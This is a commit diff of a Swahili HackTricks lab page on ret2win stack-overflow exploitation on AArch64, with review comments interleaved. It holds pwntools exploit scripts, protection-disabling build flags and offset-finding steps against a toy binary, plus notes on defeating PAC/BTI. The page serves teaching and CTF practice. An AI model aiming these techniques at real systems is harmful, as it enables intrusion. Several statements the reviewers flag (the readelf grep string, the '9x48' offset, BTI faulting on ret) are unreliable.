mirror of https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00

Translated ['src/binary-exploitation/stack-overflow/ret2win/ret2win-arm6

This commit is contained in:
parent 9f90adec3b
commit b811c3dc78
				@ -4,6 +4,7 @@

Pata utangulizi wa arm64 katika:


{{#ref}}
../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
{{#endref}}
@ -27,17 +28,29 @@ vulnerable_function();
return 0;
}
```
Kusanya bila pie na canary:
Jenga bila pie na canary:
```bash
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie -mbranch-protection=none
```
- Bendera ya ziada `-mbranch-protection=none` inazuia AArch64 Branch Protection (PAC/BTI). Ikiwa toolchain yako kwa chaguo-msingi inaweka PAC au BTI, hii hufanya maabara iwe ya kurudiwa. Ili kukagua kama binary iliyojengwa inatumia PAC/BTI unaweza:
- Tafuta sifa za AArch64 GNU:
- `readelf --notes -W ret2win | grep -E 'AARCH64_FEATURE_1_(BTI|PAC)'`
- Chunguza prologues/epilogues kwa `paciasp`/`autiasp` (PAC) au kwa `bti c` landing pads (BTI):
- `objdump -d ret2win | head -n 40`

### Ukweli mfupi kuhusu AArch64 calling convention

- The link register is `x30` (a.k.a. `lr`), and functions typically save `x29`/`x30` with `stp x29, x30, [sp, #-16]!` and restore them with `ldp x29, x30, [sp], #16; ret`.
- This means the saved return address lives at `sp+8` relative to the frame base. With a `char buffer[64]` placed below, the usual overwrite distance to the saved `x30` is 64 (buffer) + 8 (saved x29) = 72 bytes — exactly what we’ll find below.
- The stack pointer must remain 16‑byte aligned at function boundaries. If you build ROP chains later for more complex scenarios, keep the SP alignment or you may crash on function epilogues.

## Kupata offset

### Chaguo la Mchoro
### Chaguo la pattern

Mfano huu ulitengenezwa kwa kutumia [**GEF**](https://github.com/bata24/gef):

Anza gdb na gef, tengeneza mchoro na uutumia:
Anzisha gdb na gef, tengeneza pattern na uitumie:
```bash
gdb -q ./ret2win
pattern create 200
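Review bot: the check `readelf --notes -W ret2win | grep -E 'AARCH64_FEATURE_1_(BTI|PAC)'` will most likely print nothing even on a protected binary: binutils readelf decodes the GNU property note as `AArch64 feature: BTI, PAC`, and `AARCH64_FEATURE_1_BTI`/`AARCH64_FEATURE_1_PAC` are the ELF constant names from the ABI, not readelf output. Grep for `AArch64 feature` instead, or rely on the `objdump -d ret2win | head -n 40` look for `paciasp`/`bti c`, which works regardless. Also, this is a Swahili translation but the three bullets added under `### Ukweli mfupi kuhusu AArch64 calling convention` (`The link register is x30 ...`, `This means the saved return address ...`, `The stack pointer must remain ...`) are in English; translate them like the heading. Finally, `64 (buffer) + 8 (saved x29) = 72 bytes` assumes the buffer sits directly below the saved frame record; say that this layout is compiler-dependent and that the `pattern search $x30` step below is the authoritative way to get the offset.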
@ -45,17 +58,17 @@ run
```
<figure><img src="../../../images/image (1205).png" alt=""><figcaption></figcaption></figure>

arm64 itajaribu kurudi kwenye anwani katika register x30 (ambayo ilikua imeharibiwa), tunaweza kutumia hiyo kupata offset ya muundo:
arm64 itajaribu kurudi kwa anwani katika register x30 (iliyoharibika), tunaweza kutumia hiyo kupata pattern offset:
```bash
pattern search $x30
```
<figure><img src="../../../images/image (1206).png" alt=""><figcaption></figcaption></figure>

**Kipimo ni 72 (9x48).**
**Offset ni 72 (9x48).**

### Chaguo la kipimo cha stack
### Stack offset chaguo

Anza kwa kupata anwani ya stack ambapo register ya pc imehifadhiwa:
Anza kwa kupata stack address ambapo pc register imehifadhiwa:
```bash
gdb -q ./ret2win
b *vulnerable_function + 0xc
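Review bot: `**Offset ni 72 (9x48).**` carries a typo over from the line it replaces; 72 decimal is `0x48`, which is also what the `0xfffffffff148 - 0xfffffffff100 = 0x48 = 72` computation further down in this file states. Change `9x48` to `0x48`. The `b *vulnerable_function + 0xc` breakpoint is likewise a build-specific offset; a one-line hint to confirm it against the reader's own `disassemble vulnerable_function` output would avoid confusion when a different clang version lays the prologue out differently.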
@ -64,14 +77,14 @@ info frame
```
<figure><img src="../../../images/image (1207).png" alt=""><figcaption></figcaption></figure>

Sasa weka breakpoint baada ya `read()` na uendelee hadi `read()` itakapotekelezwa na uweke muundo kama 13371337:
Sasa weka breakpoint baada ya `read()`, endelea hadi `read()` itakapotekelezwa, kisha weka pattern kama 13371337:
```
b *vulnerable_function+28
c
```
<figure><img src="../../../images/image (1208).png" alt=""><figcaption></figcaption></figure>

Pata mahali ambapo muundo huu umehifadhiwa katika kumbukumbu:
Gundua wapi muundo huu umehifadhiwa katika kumbukumbu:

<figure><img src="../../../images/image (1209).png" alt=""><figcaption></figcaption></figure>

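Review bot: terminology drifts inside this hunk: `Sasa weka breakpoint ... kisha weka pattern kama 13371337:` switches to `pattern`, but the rewritten `Gundua wapi muundo huu umehifadhiwa katika kumbukumbu:` keeps `muundo` for the same thing; pick one (the heading changed earlier in this commit uses `pattern`). Also `b *vulnerable_function+28` is a hard-coded offset from one particular build: worth a short note that the reader should take the address of the instruction after the `bl read` from their own disassembly, because a different compiler version or a different default branch-protection setting (a `paciasp` in the prologue adds 4 bytes) shifts it.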
@ -79,23 +92,25 @@ Kisha: **`0xfffffffff148 - 0xfffffffff100 = 0x48 = 72`**

<figure><img src="../../../images/image (1210).png" alt="" width="339"><figcaption></figcaption></figure>

## Hakuna PIE
## No PIE

### Kawaida
### Ya kawaida

Pata anwani ya kazi ya **`win`**:
Pata anwani ya function ya **`win`**:
```bash
objdump -d ret2win | grep win
ret2win:     file format elf64-littleaarch64
00000000004006c4 <win>:
```
Kuvunja:
Exploit:
```python
from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)
# Optional but nice for AArch64
context.arch = 'aarch64'

# Prepare the payload
offset = 72
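Review bot: the heading `## Hakuna PIE` was changed to the English `## No PIE`, while its counterpart later in this commit is `## Kwa PIE` (Swahili); keep both in the same language. In the exploit, `context.arch = 'aarch64'` is set after `p = process(binary_name)`; move it above the `process()` call so that anything that reads `context` (the process object, and `asm`/`disasm` helpers if they are added later) sees it from the start. Not a bug for this script, since `p64` does not depend on `context.arch`, but it is the idiomatic order and the `# Optional but nice for AArch64` comment then reads as intended.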
@ -113,7 +128,7 @@ p.close()

### Off-by-1

Kwa kweli hii itakuwa kama off-by-2 katika PC iliyohifadhiwa kwenye stack. Badala ya kufuta anwani zote za kurudi, tutafuta **tu bytes 2 za mwisho** kwa `0x06c4`.
Kwa kweli hii itakuwa zaidi kama off-by-2 kwenye PC iliyohifadhiwa kwenye stack. Badala ya kuandika juu ya return address yote, tutaandika tena **baiti 2 za mwisho pekee** na `0x06c4`.
```python
from pwn import *

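Review bot: the rewritten sentence says what is overwritten (`baiti 2 za mwisho pekee` with `0x06c4`) but not why that is enough; add that it works only because the binary is built with `-no-pie`, so the saved return address into `main` and `win` (`0x4006c4` in the `objdump` output above) share the upper 6 bytes, and that the two bytes go out in little-endian order (`c4 06`). Without that sentence a reader will not see why the same trick needs a different argument in the PIE section.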
@ -135,16 +150,16 @@ p.close()
```
<figure><img src="../../../images/image (1212).png" alt="" width="375"><figcaption></figcaption></figure>

Unaweza kupata mfano mwingine wa off-by-one katika ARM64 katika [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/), ambayo ni off-by-**one** halisi katika udhaifu wa kufikirika.
Unaweza kupata mfano mwingine wa off-by-one kwenye ARM64 kwenye [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/), ambao ni off-by-**one** halisi katika udhaifu wa kubuni.

## Pamoja na PIE
## Kwa PIE

> [!TIP]
> Jenga binary **bila ya hoja `-no-pie`**
> Jenga binary **bila hoja ya `-no-pie`**

### Off-by-2

Bila ya leak hatujui anwani halisi ya kazi ya kushinda lakini tunaweza kujua offset ya kazi kutoka kwa binary na kujua kwamba anwani ya kurudi tunayopitisha tayari inaelekeza kwenye anwani ya karibu, inawezekana kuvuja offset kwa kazi ya kushinda (**0x7d4**) katika kesi hii na kutumia tu offset hiyo:
Bila leak hatujui anwani kamili ya win function lakini tunaweza kujua offset ya function kutoka binary na tukijua kwamba return address tunayoandika juu yake tayari inarejea kwa anwani iliyo karibu, inawezekana leak offset ya win function (**0x7d4**) katika kesi hii na kutumia offset hiyo tu:

<figure><img src="../../../images/image (1213).png" alt="" width="563"><figcaption></figcaption></figure>
```python
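Review bot: with PIE on, overwriting the low 2 bytes of the saved return address only fixes the low 12 bits deterministically (the page offset, `0x7d4` here); the top nibble of those 2 bytes comes from the randomized load address, so the attack as described succeeds on roughly 1 in 16 runs with 4 KiB pages (with a 64 KiB-page kernel the low 16 bits are fixed and it is deterministic). Say that in the text and tell the reader to loop the attempt until the `win` output appears, otherwise a failed run looks like a wrong offset. The tip `> Jenga binary **bila hoja ya `-no-pie`**` should also say to keep `-mbranch-protection=none` from the earlier build command, since PAC would make the partial overwrite fail for an unrelated reason.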
@ -166,4 +181,45 @@ p.send(payload)
print(p.recvline())
p.close()
```
### Notes on modern AArch64 hardening (PAC/BTI) and ret2win

- Ikiwa binary imejengwa kwa AArch64 Branch Protection, unaweza kuona `paciasp`/`autiasp` au `bti c` zikizalishwa katika prologue/epilogue za function. Katika hali hiyo:
- Kurudi kwa anwani ambayo si BTI landing pad halali kunaweza kusababisha `SIGILL`. Tumia kulenga entry halisi ya function inayojumuisha `bti c`.
- Ikiwa PAC imewezeshwa kwa returns, kuandika upya return‑address kwa njia rahisi kunaweza kushindwa kwa sababu epilogue inafanya authentication ya `x30`. Kwa mafunzo, jenga upya na `-mbranch-protection=none` (imeonyeshwa hapo juu). Unaposhambulia targets halisi, pendelea hijack zisizo za return (mfano, function pointer overwrites) au jenga ROP ambayo haitawahi kutekeleza jozi ya `autiasp`/`ret` inayothibitisha LR yako bandia.
- Kuangalia sifa kwa haraka:
- `readelf --notes -W ./ret2win` na tazama taarifa za `AARCH64_FEATURE_1_BTI` / `AARCH64_FEATURE_1_PAC`.
- `objdump -d ./ret2win | head -n 40` na tazama `bti c`, `paciasp`, `autiasp`.

### Running on non‑ARM64 hosts (qemu‑user quick tip)

If you are on x86_64 but want to practice AArch64:
```bash
# Install qemu-user and AArch64 libs (Debian/Ubuntu)
sudo apt-get install qemu-user qemu-user-static libc6-arm64-cross

# Run the binary with the AArch64 loader environment
qemu-aarch64 -L /usr/aarch64-linux-gnu ./ret2win

# Debug with GDB (qemu-user gdbstub)
qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu ./ret2win &
# In another terminal
gdb-multiarch ./ret2win -ex 'target remote :1234'
```
### Kurasa zinazohusiana za HackTricks

-
{{#ref}}
../../rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md
{{#endref}}
-
{{#ref}}
../../rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md
{{#endref}}



## Marejeo

- Kuwezesha PAC na BTI kwenye AArch64 kwa Linux (Arm Community, Nov 2024). https://community.arm.com/arm-community-blogs/b/operating-systems-blog/posts/enabling-pac-and-bti-on-aarch64-for-linux
- Kiwango cha Mwito wa Taratibu kwa Architecture ya Arm ya 64-bit (AAPCS64). https://github.com/ARM-software/abi-aa/blob/main/aapcs64/aapcs64.rst
{{#include ../../../banners/hacktricks-training.md}}

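Review bot: `Kurudi kwa anwani ambayo si BTI landing pad halali kunaweza kusababisha SIGILL` is not accurate for the ret2win case this page is about. BTI only checks indirect branches made with `br`/`blr`; a `ret` does not set the BTYPE state, so the overwritten `x30` consumed by the epilogue's `ret` is never BTI-checked, and the landing-pad requirement only matters once a chain pivots through `br`/`blr` gadgets (JOP). PAC (`paciasp`/`autiasp`) is what actually breaks a plain return-address overwrite, as the next bullet correctly says; reword the BTI bullet so the two are not conflated. Two smaller things in the same hunk: `readelf --notes -W ./ret2win` prints the property as `AArch64 feature: BTI, PAC`, not `AARCH64_FEATURE_1_BTI` / `AARCH64_FEATURE_1_PAC` (those are the ELF constant names), so tell the reader which string to look for; and `### Notes on modern AArch64 hardening (PAC/BTI) and ret2win`, `### Running on non‑ARM64 hosts (qemu‑user quick tip)` and `If you are on x86_64 but want to practice AArch64:` are still in English in an otherwise Swahili page.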